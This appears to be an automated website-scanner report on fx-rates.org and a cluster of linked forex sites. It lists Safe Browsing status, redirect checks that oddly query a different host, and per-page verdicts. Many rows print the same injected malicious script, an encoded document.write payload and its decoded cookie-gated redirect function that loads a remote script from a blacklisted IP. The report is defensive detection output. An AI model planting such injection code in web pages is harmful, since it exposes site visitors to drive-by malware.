Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fx-rates.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: royantajhiz.ir
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 06 Mar 2015 09:00:12 GMT
Pragma: no-cache
Server: Apache
Content-Length: 61078
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 6b913d78de26215587074821965f7894=e385f9e62c4b0b5dbc35fcdfb5662697; path=/
X-Powered-By: PHP/5.3.29
...61078 bytes of data.
GET / HTTP/1.1
Host: royantajhiz.ir
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 06 Mar 2015 09:00:12 GMT
Pragma: no-cache
Server: Apache
Content-Length: 61078
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 6b913d78de26215587074821965f7894=e385f9e62c4b0b5dbc35fcdfb5662697; path=/
X-Powered-By: PHP/5.3.29
...61078 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: royantajhiz.ir
Referer: http://www.google.com/search?q=royantajhiz.ir
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: royantajhiz.ir
Referer: http://www.google.com/search?q=royantajhiz.ir
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
| Request | Server response | Status |
http://fx-rates.org/ | 200 OK Content-Length: 15320 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21269 Content-Type: text/javascript | clean |
http://fx-rates.org/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:13 GMT Accept-Ranges: bytes ETag: "12c9bb3-4e4-3a7e5c40" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:29:29 GMT | malicious |
http://www.automated-forex-trading-software.org/ | 200 OK Content-Length: 15286 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.automated-forex-trading-software.org/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:13 GMT Accept-Ranges: bytes ETag: "12c97fc-4e4-34b10e80" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Wed, 30 Dec 2009 19:32:58 GMT | clean |
http://www.automated-forex-trading-software.org/test404page.js | 404 Not Found Content-Length: 349 Content-Type: text/html | clean |
http://fx-rates.org/business-forex-online-trading.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:14 GMT Accept-Ranges: bytes ETag: "12c9bb4-4db-3a7e5c40" Server: Apache Content-Length: 1243 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:29:29 GMT | malicious |
http://www.businessforexonlinetrading.com/ | 200 OK Content-Length: 15179 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.businessforexonlinetrading.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:14 GMT Accept-Ranges: bytes ETag: "12c9ab8-4e4-35141840" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Thu, 31 Dec 2009 13:26:49 GMT | malicious |
http://fx-rates.org/compare-forex-brokers.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:14 GMT Accept-Ranges: bytes ETag: "12c9bb5-4ce-3a7e5c40" Server: Apache Content-Length: 1230 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:29:29 GMT | malicious |
http://www.compare-forex-brokers.com/ | 200 OK Content-Length: 15221 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.compare-forex-brokers.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:15 GMT Accept-Ranges: bytes ETag: "12c9830-4e4-3bb99800" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Wed, 30 Dec 2009 19:34:56 GMT | malicious |
http://fx-rates.org/ecn-forex.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:15 GMT Accept-Ranges: bytes ETag: "12c9bb7-4b6-3a7e5c40" Server: Apache Content-Length: 1206 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:29:29 GMT | malicious |
http://www.ecn-forex.com/ | 200 OK Content-Length: 15289 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.ecn-forex.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:16 GMT Accept-Ranges: bytes ETag: "12c9865-4e4-435ab800" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Wed, 30 Dec 2009 19:37:04 GMT | malicious |
http://fx-rates.org/forex-broker-in-malaysia.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:16 GMT Accept-Ranges: bytes ETag: "12c9bb8-4d1-3a7e5c40" Server: Apache Content-Length: 1233 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:29:29 GMT | malicious |
http://www.forexbrokerinmalaysia.com/ | 200 OK Content-Length: 15860 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.forexbrokerinmalaysia.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:16 GMT Accept-Ranges: bytes ETag: "12c9c1b-4e4-43ac36c0" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:32:03 GMT | malicious |
http://fx-rates.org/forex-carry-trade.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:16 GMT Accept-Ranges: bytes ETag: "12c9bb9-4c4-3a7e5c40" Server: Apache Content-Length: 1220 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:29:29 GMT | malicious |
http://www.forexcarrytrade.com/ | 200 OK Content-Length: 15560 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.forexcarrytrade.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:17 GMT Accept-Ranges: bytes ETag: "12c9a84-4e4-30e7fac0" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Thu, 31 Dec 2009 13:25:39 GMT | malicious |
http://fx-rates.org/forex-converter.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:17 GMT Accept-Ranges: bytes ETag: "12c9bba-4c2-3a8d9e80" Server: Apache Content-Length: 1218 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:29:30 GMT | malicious |
http://www.forex-converter.net/ | 200 OK Content-Length: 15312 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.forex-converter.net/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:17 GMT Accept-Ranges: bytes ETag: "12c9a50-4e4-2c2346c0" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Thu, 31 Dec 2009 13:24:19 GMT | malicious |
http://fx-rates.org/forex-currency-converter.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:18 GMT Accept-Ranges: bytes ETag: "12c9bbb-4d4-3a8d9e80" Server: Apache Content-Length: 1236 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:29:30 GMT | malicious |
http://www.forex-currency-converter.com/ | 200 OK Content-Length: 15305 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.forex-currency-converter.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:18 GMT Accept-Ranges: bytes ETag: "12c9d4f-4e4-f0cd3800" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Sat, 02 Jan 2010 20:00:32 GMT | malicious |
http://fx-rates.org/forex-data-providers.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:18 GMT Accept-Ranges: bytes ETag: "12c9bbc-4ca-3a8d9e80" Server: Apache Content-Length: 1226 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:29:30 GMT | malicious |
http://www.forexdataproviders.com/ | 200 OK Content-Length: 15776 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.forexdataproviders.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:19 GMT Accept-Ranges: bytes ETag: "12c9a22-4e4-272189c0" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Thu, 31 Dec 2009 13:22:55 GMT | malicious |
http://fx-rates.org/forex-hedging.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:19 GMT Accept-Ranges: bytes ETag: "12c9bbe-4be-3a8d9e80" Server: Apache Content-Length: 1214 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:29:30 GMT | malicious |
http://www.forex-hedging.net/ | 200 OK Content-Length: 15378 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.forex-hedging.net/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:19 GMT Accept-Ranges: bytes ETag: "12c99ee-4e4-22b86340" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Thu, 31 Dec 2009 13:21:41 GMT | malicious |
http://fx-rates.org/forex-hedging-strategy.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:20 GMT Accept-Ranges: bytes ETag: "12c9bbd-4d0-3a8d9e80" Server: Apache Content-Length: 1232 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:29:30 GMT | clean |
http://www.forex-hedging-strategy.com/ | 200 OK Content-Length: 11392 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.automated-forex-trading-software.org <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>Forex Hedging Strategy</title> <meta name="keywords" content="automated forex trading software, business forex online trading, compare forex brokers, ecn forex, forex broke ...[4341 bytes skipped]... | ||
http://www.forex-hedging-strategy.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:20 GMT Accept-Ranges: bytes ETag: "12c9781-4e4-2f721280" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Tue, 29 Dec 2009 06:32:26 GMT | malicious |
http://fx-rates.org/forex-leverage.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 00:19:20 GMT Accept-Ranges: bytes ETag: "12c9bbf-4c0-3a8d9e80" Server: Apache Content-Length: 1216 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:29:30 GMT | malicious |
http://www.forex-leverage.com/ | 200 OK Content-Length: 15171 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||